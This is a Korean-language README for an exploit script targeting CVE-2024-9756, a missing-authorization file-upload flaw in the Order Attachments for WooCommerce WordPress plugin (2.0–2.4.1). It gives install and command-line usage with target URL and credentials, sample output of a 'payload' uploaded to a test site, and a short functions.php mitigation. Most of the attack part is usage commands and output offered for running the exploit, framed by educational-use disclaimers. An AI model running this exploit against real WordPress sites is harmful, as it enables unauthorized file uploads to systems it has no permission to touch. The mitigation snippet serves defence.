
Order Attachments for WooCommerce 2.0 - 2.4.1 - 인증된 사용자(구독자+)에 대한 인가 누락으로 인한 제한적 임의 파일 업로드
이 익스플로잇은 WordPress용 Order Attachments for WooCommerce 플러그인(버전 2.0 ~ 2.4.1)의 승인되지 않은 제한적 임의 파일 업로드 취약점을 이용합니다.
이 취약점으로 인해 인증된 사용자(Subscriber+) 는 적절한 권한 없이 제한된 파일 유형을 업로드할 수 있습니다.
이 스크립트는 교육 및 보안 연구 목적으로만 사용됩니다. 소유하지 않은 시스템에 이 익스플로잇을 무단으로 사용하는 것은 엄격히 불법입니다.
익스플로잇을 실행하기 전에 다음 사항을 확인하십시오:
requests 모듈 → 설치:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
예시:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
사용자 지정 파일 이름과 주문 ID를 지정할 수 있습니다:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
성공하면 스크립트는 업로드된 파일 URL을 반환합니다:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php를 수정하여 승인되지 않은 사용자의 wp_ajax_wcoa_add_attachment 호출을 차단하십시오:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
이 익스플로잇은 교육 목적 및 보안 연구를 위해서만 게시되었습니다.
명시적 허가 없이 시스템을 대상으로 한 무단 사용은 불법이며 사이버보안 법률에 따라 처벌받을 수 있습니다.
사용에 따른 책임은 본인에게 있습니다.